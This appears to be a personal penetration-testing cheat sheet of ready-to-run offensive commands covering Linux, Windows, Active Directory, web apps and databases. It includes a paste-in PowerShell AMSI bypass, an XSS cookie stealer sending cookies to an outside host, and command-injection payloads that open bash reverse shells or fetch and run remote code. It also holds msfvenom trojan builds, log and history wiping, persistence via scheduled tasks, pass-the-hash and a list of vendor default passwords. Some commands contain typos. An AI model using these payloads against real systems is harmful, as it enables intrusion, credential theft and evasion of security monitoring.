Linux

Command Description
nmap -sV -p- -sU -o <IP> -oN nmap.txt All ports, Os fingerprint, UDP ports, Aggressive
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=,smbpass= -p445 [IP] Check for shares
nmap -sP <x.x.x.0>/24 nmap -sn <x.x.x.x>/24 Host discovery on a network
nmap -O -T5 -PE -F --osscan-limit --max-rtt-timeout 100ms --max-parallelism 100 --min-hostgroup 100 -oX out.xml -iL ip_networks.txt Fast
sudo nmap -PE -sn <x.x.x.x>/24 Host discovery on a network, better for windows as sometimes ICMP ping packets are dropped
for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done; Living of the Land host enum
nmap -R -sL -dns-server <server> x.x.x.0/24 DNS reverse lookup on IP range
nmap <IP> -sS Syn scan
namp <IP> -sA Ack scan
nmap -n -Pn -vv -O -sV –script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 safe SMB scripts
nmap -sSU -p53 --script dns-nsec-enum --script-agrs dns-nsec-enum.domains=<domain> <nameserver> Hostname enumeration using nmap
namp --script broadcast-dhcp-discover Enumerate DHCP server
nmap -sL <ip>/24 | grep "(" | awk '{printf("%s %s\\n, $5,$6");}' Reverse DNS Sweeping
nmap -sY <IP> Looks for SCTP services with INIT/COOKIE ECHO chunk type
dnsdict -s -t 32 <domain> Enumerate IPv6 servers via DNS grinding
smbclient -U user \\\\\\\\<IP>\\\\<share> SMB connect
smbmap -H <IP> -R Recursively list all SMB shares and subfolders
enum4linux -a <IP> ENumerate WIndows and Linux Samba systems
rpcclient -U "" <target> RPC Null authentication
nslookup A record of a domain
nslookup -query=mx redhat.com Mail Exchange records
nslookup -query=ns redhat.com Name server = maps a domain to a list of DNS servers
nslookup -query=SOA redhat.com Authoritative information of a domain
tcpdump -i eth0 -w out.pcap Capture packets on eth0 and write to file
tcpdump -i eth0 port 80 dst 2.2.2.2 Capture HTTP traffic to 2.2.2.2 endpoint
tcpdump -i eth0 -tttt dst <ip> and not net <ip>/24 Show connections to a specific IP
tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply' Print all ping responses (use backticks not ‘)
tcpdump -i eth0 -c 50 -tttt 'udp and port 53' Capture 50 DNS packets and print timestamp (use backticks not ‘)
tcpdump -x Hex output in packet capture
tcpdump port <port_number> filter by port
tcpdump portrange 21-45 Filter port range
tcpdump src <x.x.x.x> dst <x.x.x.x> filter by src/ destination of packets
tcpdump -S get entire packet
xwd -display <ip>:) -root -out /tmp/test.xpm Capture remote X11 Windows and convert to JPG
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg
iptables-save -c > <file> Dump iptables rules to stdout
iptables-restor <file> Restore iptables rules
iptables -L -v --line-numbers LIst all iptables rules with line numbers
iptables -F Flush all iptables rules
iptables -P <INPUT/FORWARD/OUTPUT> <ACCEPT/REJECT/DROP> CHange default policy for rules that don’t match the rules
iptables -A output -o <iface> -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT Allow SSH on port 22 OUTBOUND
iptables -A INPUT -i <iface> -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT Allow SSH on port 22 OUTBOUND
dig -x <IP> Domain lookup
dig axfr example.com @ns1.example.com DNS Zone transfer
dig <domain> AAAA IPv6 address of domain
dig <domain> MX Mail records
dig <domain> soa SOA records/ emergency email in second column
dig <domain> ns Name servers
dig <domain> txt TXT records
dig @nserver_kerberos.tcp.fqdn SRV +short Discover domain controllers
echo "1" > /proc/sys/net/ipv4/ip_forward turn on ip forwarding
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d <pivotip> --dport 443 -to-destination <attack_ip>:443 All 3 below needed for port forwarding
iptables -t nat -A POSTROUTING -p tcp -i eth0 -j SNAT -s <target subnet cidr> -d <attackip> --dport 443 -to-source
iptables -t filter -I FORWARD 1 -j ACCEPT
sudo iptables -A FORWARD -i <interface-between-box1&2> -o <interface-between-box2&3> -j ACCEPT Forward traffic coming from interface 1 through interface 2
sudo iptables -A FORWARD -i <interface-between-box2&3> -o <interface-between-box1&2> -m state --state ESTABLISHED,RELATE -j ACCEPT Forward traffic coming from interface 2 through to interface 1
sudo iptables -t nat -A POSTROUTING -o <interface-between-box2&3> -j MASQUERADE Masquerade source IP in TCP packets (for getting internet connection through a machine that has internet access)
ssh -R <anyPort>:localhost:22 username@target Then ssh username@localhost -p<port> Reverse Reverse port forward (Allows you to ssh out of a machine that is blocked from external ssh access)
ssh -L 9090:127.0.0.1:9090 dennis@192.168.22.100 port forward internal port
echo "nameserver x.x.x.x > /etc/resolv.conf" Add DNS Server
base64 -w 0 <fileName> and then echo "<base64String>"" | base64 -d > out.txt Transfer files via base64
scp <file> user@x.x.x.x:/tmp/file Put file scp
scp user@x.x.x.x:/tmp/file /tmp/file Get file scp
mount /dev/sda1 /mnt/test Mount files
mount <ip>:/share /mnt/nfs mount nfs share
mount -o nolock -t nfs -o proto=tcp,port=2049 172.16.1.1:/ /mnt mount nfs share
sudo mount -o vers=3 192.168.22.100:/home/user2 ./user2 Change NFS version, version4 obfuscates userIDs and GIDs
sudo usermod -u <UID> <username> change UID of user to be able to read nfs files
mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windows mount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no mount a Windows share
sort -u sort unique lines
tar cf file.tar files Create .tar from files
tar xf file.tar Extract .tar files
tar czf file.tar.gz files Create .tar.gz files from files
tar xzf file.tar.gz Extract .tar.gz files
tar cjf file.tar.bz2 files Create .tar.bz2 files from files
tar xjf files.tar.bz2 Extract .tar.bz2 files
gzip file Compress/ rename file
gzip -d file.gzip Extract gzip files
upx -9 -o out.exe orig.exe UPX compresses orig.exe into out.exe
zip -r <zipname.zip> <directory> Zips directory
split -b 9K \<file> <prefix> splits file into 9K sized chunks
awk 'sub("$"."\r")' unix.txt > win.txt Convert unix file to windows compatible file
find -i - name <file> -type *.pdf FInd pdf files
find / -perm 4000 =o -perm -2000 -exec ls - lbd {} \; Search for suid files
dos2unix file Windows file to unix file
cat /etc/*syslog*.conf | grep -v "^#" List of log files
grep 'href' <file> | cut -d"/" -f3 | grep <url> | sort -u Strip links in url.com (remove \ they are meant to be pipes not OR)
echo "" > /var/log/auth.log Clear auth logs
echo "" > ~/var/log/.bash_history clear commands history
export HISFILESIZE=0 Set history max file size 0
export HISTSIZE=0 Set history commands to 0
kill -9 $$ Kill current session
ln /dev/null #/.bash_history -sf Send all bash history commands to /dev/null
hydra -L users -P passwords -M 21.txt ftp Bruteforce FTP
hydra -L users -P passwords -M 22.txt ssh Bruteforce SSH
hydra -L users -P passwords -M 445.txt smb Bruteforce SMB
crackmapexec <protocol> -U <UserList> -p "PasswordToSpray" Password spray
crackmapexec <ip> -u Administrator -p 'P@ssw0rd' -x whoami Command execution
crackmapexec smb 192.168.215.104 -u Administrator -p 'P@ssw0rd' -M mimikatz o COMMAND='privilege::debug'
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP> bruteforce SNMP, msfconsole, nmap and hydra can also be used
rdesktop <IP> rdp into windows machine
rlogin -l <ip> login with R* Services to server with rlogin port open - if misconfigured dont need a password
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V bruteforce rlogin
rexec <ip> remote command execution on ip
rwho <ip>
rsh <ip> Remote shell on system
rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rcp file.txt <ip>:/path/to/file.txt
rstat Returns kernel performance statistics
ruptime
python /usr/share/responder.py rouge DHCP server (half duplex so does not receive responses from legitimate DHCP server, only the clients broadcast)
ettercap -Tar cpature.pcap (or -i <interface>) Grab hashes from RIP authentication
ping6 -c2 -I <interface> ff02::1 Identify IPV6 neighbours
xwd -root -screen -silent -display 192.168.1.109:0 > screenshot.xwd convert screenshot.xwd screenshot.png Take screenshot of server through vulnerable X11 port
xwininfo -root -tree -display 192.168.1.109:0 Shows information for X service
xspy <ip> Log keystrokes though vulnerable X11 service
sudo ifconfig <interface> mtu 1200 Fix ssh hanging issue
rdesktop <ip> RDP option
xfreerdp /v:<ip> /u:<username> RDP when rdesktop doesn’t work
remmina RDP option
cat output.csv | sed 's/,/ ,/g' | column -t -s, | less -S View csv output in command line (use arrow keys to scroll horizontally)
xq <filename> cat <filename> | xq jq but for xml files!!!!!
GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME>:<PASSWORD> -outputfile hashes.kerberoast Kerberoast users
nbtscan <IP_addr> NBT scan / enumerate NetBios (ports 137, 138, 139)
sslscan <hostname/ip> TLS/SSL check - look for vulnerable versions or potential for downgrade attacks, insecure ciphers etc.

Linux exploits

finger:

RHOST=attacker.com
LFILE=file_to_save
finger x@$RHOST | base64 -d > "$LFILE"
Command Description
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!/bin/sh'
sudo base64 "$LFILE" | base64 --decode
sudo mysql -e '\! /bin/sh'

Solaris OS

Command Description
dladm show-link Checking network device status
svcadm -t enable service Start service
svcs service display service status
svcs -a display list of services
zpool create pool <pool_name> RAID device_name Create volume group
zfs create <File_system_name> Create file system
zfs mount <FIle_system_name> Mount file system
zoneadm -z <zone_name> install Basically like docker pull <image name>
showrev -P Patch information
/etc/ftpd/tfpusers Not a command i know, but file location for FTP access control on solaris

Metasploit

Command Description
use auxiliary/scanner/http/dir_scanner Scan for directories
use auxiliary/scanner/http/jboss_vulnscan Jboss scan
use exploit/multi/http/jboss_maindeployer Jboss deploy
use auxiliary/scanner/mssql/mssql_login MySQL cred scan
use exploit/windows/mssql/mssql_payload MySQL payload
use auxiliary/scanner/mysql/mysql_version MySQL version scan
use auxiliary/scanner/mysql/mysql_login MySQL login
use auxiliary/scanner/oracle/oracle_login Oracle login
use exploit/windows/dcerpc/ms03_026_dcom
use exploit/windows/smb/ms06_040_netapi
use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
run post/windows/gather/win_privs Show privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target) bypass UAC on windows7
load mimikatz -> wdigest dump creds
load incongnito -> list_tokens -> impersonate_token Use tokens
use post/windows/gather/credentials/gpp GPP
run post/windows/gather/local_admin_search_enum Test other machines
use exploit/multi/handler Payload handler/ listener for rev shells
use auxiliary/scanner/ipmi/ipmi_version Scan for ipmi interfaces (part of BMCs)
use auxiliary/scanner/ipmi/ipmi_dumphashes dump ipmi hashes
use auxiliary/gather/kerberos_enumusers Enumerate users
use auxiliary/scanner/oracle/sid_enum Enumerate oracle database SID values
use auxiliary/scanner/oracle/sid_brute
unix/x11/x11_keyboard_exec Get shell via vulnerable x11 service

msfvenom

Command Description
msfvenom -p windows/exec CMD='net localgroup administrators <user> /add' -f exe-service -o common.exe Service executable malicious payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe Windows meterpreter shell
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o payload.exe Windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT = -f py (or c) -b '\x00' -o shellcode.py (or .c) Generate shell code
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf -o payload.elf Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -x /usr/bin/nc -k -f elf -o payload.elf Create trojan out of a legit binary
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST= LPORT= -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf Solaris OS

Windows

Command Description
/accepteula If ever using CLI sysinternals tools you need to accept the EULA or you get a really annoying prompt every time you run the tool
reg.exe ADD HKCU\Software\Sysinternals /v EulaAccepted /t REG_DWORD /d 1 /f Removing eula prompt from sysinternals tools
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe download file with certutil
Invoke-WebRequest -Uri "http://192.168.22.2:8000/nc.exe" -OutFile "c:\tmp\nc.exe" Download file
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') Download file
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1'); Invoke-AllChecks" Loads powershell script straight into memory
powershell -nop -ep bypass Bypass powershell execution policy
$file = [convert]::ToBase64String((Get-Content -path "c:\tmp\20220613215954_BloodHound.zip" -Encoding byte)) Convert file to base64 for file transfer (copy b64 output and decode on your local kali machine)
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("base64String")) Convert from base64 (take base64 input and decode it on the server for file transfer)
netstat -ano Port scan, same as netstat -tunlp
sc query net start wmic service get name,startname Get-Service OR Get-Service | Where-Object {$_.Status -eq "Running"} OR services List all services on the machine (good for finding a service for CLSIDs)
whoami /priv Enumerate privileges for current user
whoami /all
net user Enumerate all users on the host
ipconfig /all Enumerate current AD Domain
wmic printer list brief Enumerate printers
Get-Printer Enumerate printers
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon auto logon credentials
sc config <service> binpath="<path of payload>" Exploit weak service permissions
sc start/stop <> start/stop a service
sc qc <service> Query service configuration/permissions
icacls permissions of a file/ directory
net share List all SMB shares
net use X: \\Server\Share Map network share to drive X (then cd X:\ ) - can use any unused letter
nbtstat -n Retrieve NetBios names of local device
nbtstat -A <IP_addr> Retrieve NetBios name of remote host (01 and 1D indicate the master browser, 03 is the user)
findstr /spin "password" *.* Find the string password in all file types
Import-Module <module i.e PowerUp.ps1> Import powershell scrips to enhance powershell functionality
SCHTASKS /CREATE /SC ONSTART /TN "MyTasks\PERSISTENCE" /TR "c:\windows\temp\implant.exe Create a scheduled task for persistence (HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, and ONEVENT.)
ldapdomaindump 192.168.151.175 -u <username> -p <password> dump ldap
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Bypass Amsii

Just copy and paste this entire block into powershell

$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

LDAP enumeration 

import ldap3

server = ldap3.Server('10.10.11.152', port =389)
connection = ldap3.Connection(server, "<username>", "<password>") #leave blank for null authentication
connection.bind()
x = connection.search(search_base='DC=example,DC=com', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') # domain here is example.com

# ---- Old filter ----
# search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))', search_scope='SUBTREE', attributes=['ms-MCS-AdmPwd','SAMAccountname'])

print(connection.entries)

print(server.info)

Dump the entire LDAP domain

ldapdomaindump --user 'DOMAIN\USER' --password $PASSWORD --outdir ldapdomaindump $DOMAIN_CONTROLLER

Active Directory (Unauthenticated)

Command Description
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP> Null and Guest access to SMB services
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP> NUll and Guest access to SMB services
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L // Null and Guess access to SMB services
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP> LDAP enumeration
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP> User enumeration
python GetNPUsers.py <domain.com>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast ASREPRoast users
rpcclient -U '' -N 10.10.10.1
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> technically an authenticated attack but usually done before network foothold

Active Directory (Authenticated)

Command Description
net user /domain, Get-DomainUser, wmic useraccount get name,sid Different ways to extract all domain users
net group "domain admins" /domain Check domain admins group
GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username, enum4linux -a -u "user" -p "password" <DC IP> Different ways to extract all domain users from linux
ConsoleHost_history PowerShell history
net users Enumerate all users
net localgroup Administrators Enumerate users in the administrator group
whoami /all All privileges for your current user
Tasklist /SVC LIst running services and processes
tasklist /v /fi "username eq system" Filter for processes running as SYSTEM
procdump.exe -accepteula -ma <proc_name_tasklist> Memory dump running processes
net start; wmic service list brief; sc query; Get-Service Get a list of services
accesschk.exe -ucqv <Service_Name> sysinternals tool, Check rights for different groups
net view /all /domain [domainname] All shares on the domain
net share Current shares
netstat -ano Look for open ports
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" Credentials (remove \ from \|)
Get-DomainUser -PreauthNotRequired -verbose List ASREProastable users using powerview (powershell)
Get-ADTrust -Identity <domain> Get outbound trust details for domain root.local (powershell)
systeminfo | findstr /B /C:"Domain" or echo %userdomain% or ipconfig /all List current domain (remove \ from \|)
runas /user:USERNAME “C:\full\path\of\Program.exe” run a command as a different user
runas /user:ComputerName\administrator cmd run command as different user on different computer
runas /user:myDomain\administrator cmd
runas /user:<domain\user> cmd
python3 /usr/share/impacket/wmiexec.py test.local/john:password123@10.10.10.1 from linux gain interactive shell on windows machine (needs WMI open)
WMIC /node:target-computer-name process call create “cmd.exe /c task-name”
evil-winrm -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’ evilwinRM shell from linux
evil-winrm -i 192.168.1.100 -S -k <private key> -c <public key> evilWinRM with private key
psexec \\computer_name -u username -p password cmd.exe Sysinternals command to run remote commands
Get-AdUser -Server "DC.Domain_A.local" -Identity "Name_of_account" -Properties * Get user info of user in separate domain within trust
impacket-addcomputer '<domain>/user:password' -method LDAPS -computer-name "testPC" -computer-pass 'password' Add a computer to a AD domain
Get-ADComputer <computerName> powershell command to grab properties like SID, DNS hostname of a computer in a domain
Get-NetUser -SPN | select serviceprincipalname PowerView, get user service accounts
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe mimkatz pass the hash (needs administrator privileges)
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local Get TGS in memory
nltest /domain_trusts view domain trusts

Checking permissions of the processes binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
	for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
		icacls "%%z" 
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
	)
)

Checking permissions of the folders of the processes binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v 
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users 
todos %username%" && echo.
)

Chisel

Scenario: you’ve compromised a host and you are trying to pivot further into the internal network to machines that are not internet facing. What do you do? create a reverse socks proxy connection with chisel between your kali and the compromised host to forward traffic to the interna network. This way you can nmap/ rdp into internal hosts straight from your kali!!!!

make sure to include this line in /etc/proxychains4.conf

socks5          127.0.0.1 1080
Command Description
chisel.exe server -p 8000 -socks5 -reverse Set up “server” on your kali
chisel64.exe client 192.168.22.2:8000 R:1080:socks connect back to server from the compromised host
proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output speed up nmap through proxychains
seq 1 1000 | xargs -P 50 -I{} proxychains -q nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output really fing fast nmap through proxy chains
grep open/tcp proxychains_nmap | sort | uniq | awk {'print($5)};' | cut -d "/" -f 1,3,5 | sort -n grep output for the open ports

How does chisel work?

  • good question…

Other tunneling commands

Command Description
ssh -L 127.0.0.1:1234:10.10.10.5:3389 user@10.10.2.30 SSH port forward. Use this to forward packets from 127.0.0.1:1234 to 10.10.10.5:3389 via 10.10.2.30 Now you can RDP into the box with the address 127.0.0.1:3389
ssh -D 1080 yourlab@10.10.2.30 SSH Socks proxy. Make sure to configure /etc/proxychains4.conf like with chisel. Now just run proxychains <yourcommand>
ssh -L 9090:127.0.0.1:9090 user@192.168.22.100 Remote/Reverse port forward. Forward traffic from port 9090 on the internal network to 9090 on your localhost.

Webapp

XSS

Command Description
<script> document.write('<img src="http://x.x.x.x:8000/?cookie=' + document.cookie + '" />) </script> Cookie stealer with script tags
<img src=1 href=1 onerror="javascript:console.log('XSS Test')">
<img src/onerror=alert(1)>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<svg onload=alert(1)>
<svg id=x onfocus=alert(1)>
<svg width="400" height="400"> <image href="text:/etc/passwd" height="400" width="400"/></svg> SSRF through PDF generator
<img src='s' onerror="$('body').append('<script src=\'[http://attacker.com/xss.js](http://attacker.com/xss.js)\'>')"> load malicious js payload from your malicious site (if inline scripts don’t work)

SQL injection manually

Command Description
' union select null,null,null,null,null from information_schema.tables;-- Enumerate amount of columns
' UNION SELECT NULL,table_name,table_schema,null,null from information_schema.tables;-- Grab table names
' UNION SELECT null,column_name,null,null,null from information_schema.columns where table_name='<TableName>';-- Grab column names in table
' UNION SELECT null,Username,Password,null,null from <TableName>;-- Exfiltrate information

ADD BLIND AND TIME BASED

Command injection

Command Description
SomeFunctionality=NormalInput;id
&id
&&id
id%00
`id` use backticks
|ls
||ls
$(ls)
> /var/www/html/out.txt Not code execution but could be interesting to redirect output
< /etc/passwd Could send input into something
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1; bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1&& bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1&&bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
vuln=127.0.0.1 && bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 Spacing sometimes can make a difference
?cmd={payload}
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi time based data exfiltration - THis payload will sleep for 5 ms if the name of the user starts with a s
system('cat%20/etc/passwd')
\n/bin/ls -al\n
%0A/usr/bin/id%0A

Directory enumeration

Command Description
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt Basic enumeration
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fw <number> Filter by words
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fl <number of lines> Filter by number of lines
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fc <response code> Filter out response codes i.e. 404, 403
gobuster dns -d <domain.com> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Directory enumeration

Automated Vuln scanning

Command Description

Databases

MySQL

  • port 3306
Command Description
select version(); get version
show databases; show databases
show tables; show tables
use <database name>; enter that database
select * from <table name>; select info from a table
mysql.user password hashes location
SELECT * FROM mysql.user* Password hashes

PostgreSQL

  • port 5432
Command Description
psql -U <myuser> <IP>
psql -h <host> -U <username> -d <database> Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> Remote connection
SELECT version(); Get version info
\list List databases
\c <database> Use database
\d List tables
\du+ List user toles
\conninfo Connection information
SHOW hba_file; find config files
SELECT usename, passwd from pg_shadow; Grab password hashes
createdb <database name> Create a database
psql -d <database name> Login locally to database
REATE TABLE users (ID INT PRIMARY KEY NOT NULL, username character (255) NOT NULL, password character (255) NOT NULL); Create table
INSERT INTO users (ID, username, password) values ('1', 'administrator', '736a125730d192f1560ac2f56798ac958c5f84b086b48a8bc9da3217f9477c6b'); Insert data into table
DROP TABLE <table_name>; Delete table
ALTER USER <user> WITH PASSWORD '<password>'; Change password for user

Metasploit modules 

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

MSSQL

  • TCP/1433 - SQL server port
  • TCP/2433 - Hidden mode
  • TCP/1434 Named instance - Monitor port
  • UDP/1434 SQL Server Browse
  • Password hashes are stored in master.dbo.sysxlogins
Command Description
sqlcmd -u <user> -p <password> Login to mssql locally in cmd
'EXEC xp_cmdshell 'powershell -c Invoke-WebRequest -Uri "http://192.168.22.2:8000/nc.exe" -OutFile "C:\windows\Temp\nc.exe"'; -- Command execution with xp_cmdshell (dir, type, ls etc do not work as stdout won’t be displayed)
sqlmap -u "htpL//<url>" --os-shell Command execution through sqlmap xp_cmdshell
SELECT @@version DB version
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); List columns
EXEC sp_databases Show database instances
EXEC sp_helpdm <dbname> Show database description
USE <database name>
EXEC sp_tables Show tables
SELECT name, password FROM Maste.dbo.sysxlogins Show password hases

Default accounts

  • SQL 2000 = SA user, blank password
  • SQL 2005 = SA user, password not set

Oracle DB

  • Port 1521
  • Oracle use something called the Transparent Network Substrate (TNS) for authenticating to their databases. It is a protocol that handles authentication outside of the database.
  • Oracle used SID values to uniquely identify databases
    • SID values can be bruteforced to discover databases within an Oracle environment (version 9.2.0.7 and below)
    • use auxiliary/scanner/oracle/sid_enum
    • use auxiliary/scanner/oracle/sid_brute
  • Password hashes are stored in sys.user$

nmap -sSV -p1521 -n <IP>

Command Description
SELECT * FROM v$version;* DB Version
SELECT instance_name FROM v$instance Current DB
SELECT name FROM v$database Current DB
SELECT DISTINCT owner FROM all_tables; List DBs
SELECT user FROM dual; current user
SELECT username FROM all_users ORBERY BY username; List users
SELECT column_name FROM all_tab_columns; List tables
SELECT name, password, astatus FROM sys.user$; List password hashes
SELECT username, password FROM dba_users Show databse user/password
SELECT name, password FROM SYS.USER$ Shows passwords in DES hash
SELECT name, spare4 FROM SYS.USER$ Show passwords in SHA-1

Default accounts

Username Password
SYS CHANGE_ON_INSTALL
SYSTEM MANAGER
DBSNMP DBSNMP
SYSADM SYSADM
SCOTT TIGER
OUTLN OUTLN
MDSYS MDSYS

Connect to Oracle DB

Windows 

CONNECT username/password@<IP>:<PORT>

Linux 

$ export ORACLE_HOME=/path/to/oracle/home 			#usually /usr/lib/oracle/<version>/client64/
$ export LD_LIBRARY_PATH="$ORACLE_HOME"
$ export PATH="$ORACLE_HOME:$PATH"

Local:

sqlplus sys as sysdba

Remote:

sqlplus username/password@<IP>/<database>
TNS Connectivity 
tnscmd10g

tnscmd10g version -h <IP>

SQLmap

Command Description
sqlmap -u "http://<url>" check its injectable
sqlmap -u "http://<url> --current-db Grab current database
sqlmap -u "http://<url> -D "database" --tables Grab table names for current DB
sqlmap -u "http://<url> -D "database" -T "tableName" --dump Get contents of table

Password cracking

Hashcat 

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
hashcat -m 13100 --force -a 0 hashes.kerberoast rockyou.txt

John 

john --wordlist=passwords_kerb.txt hashes.asreproast
john hashList.txt
john --show hashList.txt # show password once hash has been cracked

john --format=krb5tgs --wordlist=rockyou.txt hashes.kerberoast

Default credentials

Vendor Username Passwords
APC apc, device apc
Brocade admin admin123, password, brocade, fibranne
Cisco admin, cisco, enable, hsa, pnadmin, ripeop, root, shelladmin admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!123_, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix root, nsroot, nsaint, vdiadmin, kvm, cli, admin Citrix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link admin, user private, admin, user
Dell root, user1, admin, vkernel, cli calvin, 123456, password, vkernel, Stor@age!, admin
EMC admin, root, sysadmin EMCPAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com admin, root, vcx, app, spvar, manage, hpsupport, opc_op admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei admin, root 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM USERID, admin, manager, mqm, db2inst1, db2fenc1, dbusr1, db2admin, iadmin, system, device, ufmcli, customer PASSWORD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper netscreen netscreen
NetApp admin netapp123
Oracle root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user changme, ilom-admin, ilom-operator, welcome1, oracle
